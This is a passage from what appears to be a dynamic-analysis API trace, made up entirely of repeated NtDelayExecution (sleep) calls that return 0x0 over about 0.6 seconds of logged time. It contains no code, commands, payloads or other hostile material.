(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.450] NtDelayExecution 